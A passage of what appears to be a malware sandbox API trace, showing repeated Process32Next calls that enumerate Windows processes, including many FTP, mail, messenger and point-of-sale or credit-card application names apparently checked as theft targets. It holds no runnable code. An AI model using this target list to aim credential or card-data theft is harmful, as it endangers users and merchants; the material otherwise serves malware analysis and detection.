cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.905] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0246.907] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.909] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0246.950] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0246.952] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0246.954] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0246.957] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0246.959] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0246.962] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.964] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.967] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0246.969] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.971] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.973] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.975] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.978] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.980] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0246.982] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0246.984] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0247.071] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0247.073] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0247.075] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0247.077] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0247.079] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0247.080] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0247.082] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0247.083] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0247.086] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0247.088] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0247.090] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0247.091] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0247.093] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0247.094] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0247.096] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0247.098] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0247.099] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0247.102] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0247.104] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0247.106] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0247.143] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0247.146] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0247.168] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0247.172] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0247.175] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0247.178] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0247.180] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0247.183] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0247.185] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0247.188] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0247.190] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0247.194] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0247.201] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0247.204] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0247.207] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0247.209] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0247.213] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0247.215] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0247.218] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0247.220] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0247.223] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0247.226] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0247.229] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0247.232] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0247.234] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0247.244] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0247.246] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0247.249] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0247.251] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0247.254] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0247.256] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0247.259] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0247.261] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0247.264] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0247.267] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0247.270] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0247.272] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0247.275] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0247.277] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.283] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0247.285] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.288] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.290] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0247.293] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.295] Process32Next (in: hSnapshot=0x22f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 